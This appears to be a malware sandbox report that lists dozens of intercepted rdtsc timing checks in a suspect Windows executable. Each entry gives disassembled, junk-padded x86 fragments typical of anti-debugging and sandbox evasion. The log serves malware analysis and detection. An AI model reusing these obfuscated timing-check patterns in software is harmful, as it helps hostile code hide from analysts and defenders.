                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D376E second address: 12D3825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnl 00007FF674E409C4h 0x0000000e nop 0x0000000f or dword ptr [ebp+122D35B9h], edi 0x00000015 push 00000000h 0x00000017 sub dword ptr [ebp+122D17A3h], edi 0x0000001d push B3E9FC2Ch 0x00000022 jmp 00007FF674E409C5h 0x00000027 add dword ptr [esp], 4C160454h 0x0000002e mov edi, ecx 0x00000030 push 00000003h 0x00000032 mov si, FF1Ah 0x00000036 push 00000000h 0x00000038 cld 0x00000039 push 00000003h 0x0000003b push B4A11D71h 0x00000040 jmp 00007FF674E409C8h 0x00000045 xor dword ptr [esp], 74A11D71h 0x0000004c jmp 00007FF674E409C0h 0x00000051 mov esi, edi 0x00000053 lea ebx, dword ptr [ebp+12445388h] 0x00000059 mov esi, 5DF655EFh 0x0000005e push eax 0x0000005f pushad 0x00000060 jmp 00007FF674E409C8h 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BF7C7 second address: 12BF7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6744C8CA6h 0x00000009 jmp 00007FF6744C8CA3h 0x0000000e popad 0x0000000f jl 00007FF6744C8C9Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F2AD0 second address: 12F2AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F2AD6 second address: 12F2AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF6744C8C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F2AE0 second address: 12F2AE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F2D60 second address: 12F2DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FF6744C8CA0h 0x0000000b pushad 0x0000000c jne 00007FF6744C8C96h 0x00000012 jmp 00007FF6744C8CA0h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007FF6744C8CA1h 0x00000021 jne 00007FF6744C8C96h 0x00000027 jmp 00007FF6744C8CA5h 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F2EEF second address: 12F2EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F2EF4 second address: 12F2F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007FF6744C8C96h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F2F03 second address: 12F2F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3086 second address: 12F30A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF6744C8C9Fh 0x0000000b popad 0x0000000c jnp 00007FF6744C8C9Ch 0x00000012 jng 00007FF6744C8C96h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E6FE5 second address: 12E6FE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2C96 second address: 12C2CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF6744C8CA0h 0x00000009 pushad 0x0000000a jmp 00007FF6744C8CA2h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FF6744C8C9Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2CCF second address: 12C2CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3899 second address: 12F38C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF6744C8C96h 0x0000000a jmp 00007FF6744C8CA7h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F38C0 second address: 12F38C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F38C8 second address: 12F38CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F38CE second address: 12F3904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FF674E409B8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FF674E409BCh 0x00000016 push ebx 0x00000017 jng 00007FF674E409B6h 0x0000001d jmp 00007FF674E409C2h 0x00000022 pop ebx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3904 second address: 12F391C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF6744C8CA3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3A4F second address: 12F3A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FF674E409B6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5444 second address: 12F5469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F5469 second address: 12F5483 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF674E409B6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FF674E409BAh 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7B60 second address: 12F7B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FF6744C8CA7h 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FF6744C8CA1h 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7B99 second address: 12F7BD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FF674E409C9h 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 jmp 00007FF674E409C0h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7BD4 second address: 12F7BD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FEA97 second address: 12FEAA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF674E409B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FEAA3 second address: 12FEACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF6744C8CA7h 0x0000000e jmp 00007FF6744C8C9Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDDA1 second address: 12FDDB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDDB1 second address: 12FDDD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF6744C8C9Ch 0x00000009 jmp 00007FF6744C8CA2h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDF22 second address: 12FDF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FF674E409C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDF3D second address: 12FDF7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF6744C8C96h 0x00000009 jmp 00007FF6744C8CA6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF6744C8CA9h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDF7A second address: 12FDF7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FDF7E second address: 12FDFA6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF6744C8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e jmp 00007FF6744C8CA3h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE729 second address: 12FE73E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409BCh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE73E second address: 12FE745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FE8E9 second address: 12FE912 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007FF674E409B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FF674E409C8h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301549 second address: 130154D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130154D second address: 1301583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FF674E409C9h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF674E409BFh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301583 second address: 13015D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d pushad 0x0000000e jg 00007FF6744C8C96h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 jno 00007FF6744C8CA4h 0x00000026 pop eax 0x00000027 mov esi, dword ptr [ebp+122D3940h] 0x0000002d call 00007FF6744C8C99h 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 jg 00007FF6744C8C96h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13015D0 second address: 1301603 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF674E409B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007FF674E409BCh 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF674E409C7h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301603 second address: 1301607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301607 second address: 130160D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130160D second address: 1301663 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF6744C8C9Ch 0x00000008 jnc 00007FF6744C8C96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007FF6744C8CA7h 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c jnl 00007FF6744C8C98h 0x00000022 jmp 00007FF6744C8C9Ch 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FF6744C8C9Dh 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301663 second address: 1301668 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13017E3 second address: 1301801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13019C5 second address: 13019CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1302315 second address: 1302319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1302319 second address: 130234E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF674E409B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b xchg eax, ebx 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FF674E409B8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push eax 0x00000027 pushad 0x00000028 jnp 00007FF674E409B8h 0x0000002e pushad 0x0000002f popad 0x00000030 push ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130261D second address: 1302627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13028BA second address: 13028BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13037DC second address: 13037E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1303644 second address: 130364A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13053A0 second address: 13053A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13053A4 second address: 13053AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1305061 second address: 130507E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13053AE second address: 13053B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130507E second address: 130509B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF6744C8C96h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 pushad 0x00000015 js 00007FF6744C8C96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307417 second address: 130741B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130741B second address: 13074A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 call 00007FF6744C8C9Dh 0x0000000d ja 00007FF6744C8C9Ch 0x00000013 pop esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FF6744C8C98h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov dword ptr [ebp+124555E7h], ebx 0x00000036 jmp 00007FF6744C8CA0h 0x0000003b push 00000000h 0x0000003d xchg eax, ebx 0x0000003e jg 00007FF6744C8CADh 0x00000044 push eax 0x00000045 jc 00007FF6744C8CA0h 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e pop eax 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307E61 second address: 1307E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307E65 second address: 1307E7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A9ED second address: 130AA05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FF674E409BAh 0x0000000c jo 00007FF674E409BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D054 second address: 130D05A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130E134 second address: 130E13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D05A second address: 130D05F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130E13F second address: 130E143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D05F second address: 130D065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130E143 second address: 130E147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F0B2 second address: 130F0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FF6744C8C9Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BDBDA second address: 12BDBE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D065 second address: 130D0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007FF6744C8C98h 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 nop 0x00000017 jbe 00007FF6744C8C99h 0x0000001d movsx edi, cx 0x00000020 mov bx, E622h 0x00000024 push dword ptr fs:[00000000h] 0x0000002b mov dword ptr [ebp+122D3159h], edi 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 jmp 00007FF6744C8CA4h 0x0000003d jmp 00007FF6744C8CA2h 0x00000042 mov eax, dword ptr [ebp+122D0D41h] 0x00000048 push FFFFFFFFh 0x0000004a mov dword ptr [ebp+122D34F5h], edi 0x00000050 nop 0x00000051 pushad 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F0C3 second address: 130F0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13117A4 second address: 13117AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13146F2 second address: 13146F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131376F second address: 1313773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13146F7 second address: 13147A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF674E409C9h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FF674E409B8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 jmp 00007FF674E409BBh 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007FF674E409B8h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 je 00007FF674E409BCh 0x0000004f mov ebx, dword ptr [ebp+122D1B23h] 0x00000055 push 00000000h 0x00000057 mov ebx, edi 0x00000059 xchg eax, esi 0x0000005a pushad 0x0000005b jmp 00007FF674E409C5h 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FF674E409C5h 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313773 second address: 1313793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FF6744C8C96h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13147A0 second address: 13147A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313793 second address: 13137AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007FF6744C8C9Dh 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131580B second address: 1315811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
